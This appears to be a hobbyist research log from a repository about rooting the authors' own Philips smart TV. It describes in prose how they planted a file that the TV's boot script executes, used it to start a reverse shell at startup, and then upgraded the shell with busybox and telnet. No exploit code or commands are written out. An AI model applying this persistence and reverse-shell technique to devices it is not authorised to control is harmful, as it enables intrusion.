Sunpy/Philips_TV
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
master
Philips_TV/research/28_apr_2020.md

2.3 KiB
Raw Permalink Blame History

28 April 2020

We start off the day by picking up from last time and continue with the stack overflow exploit. More people in our community/group gets interested in what we are trying to do so we get some new eyes on the subject.

First shell command

HoLLy wanted me to try more with the accessLocalStorage function and see if we could do anything useful with it. It turns out we have write permissions into one other directory then /tmp (and maybe some others less important right now); that being /3rd_rw. At first glance it did not seem to give us any more foothold as there is nothing of importance. Going though /basic/autorun.sh a few more times I find one instance of /3rd_rw calls. If /3rd_rw/browser_engine/global_env_setup.ini exists then it executes it. Lucky for us this file does not even exist, so there is no harm trying. Just make the new file in the directory and put a command in. We tried to touch a file to see if it ran during boot and it did!

Being unsure if the whole bash script sequence would stop if something errored in the new script we made sure to start everything as a background task and on a timer that would be enough to fix the error if something bad occurred. After some fiddling around we got basic bash with a reverse shell to run on startup (30 seconds after boot to ensure the TV had connected to the network). We had some issues to get that to work due to the TV being the one that makes the connection to my PC to establish the reverse shell connection.

Shell upgrade

The current environment is limited and stripped down so we do not even know who we are yet. We have wget, but without ssl support. I ended up downloading busybox and sending it over to upgrade to a better shell. Busybox worked flawlessly and we upgraded the reverse shell to start telnet and later made a login script that setup some path variables on login. Note that we had to mount /dev/pts to use telnet because we need to spawn a new ptty for every telnet session.
neofetch

TV server

After dealing with java issues we got a minecraft 1.7.3 beta server to run. This is by far the most inefficient way of testing performance.

Future work

Currently we can not run Crysis (yet) as we need to find out how to render to the TV screen as well as to compile missing libraries.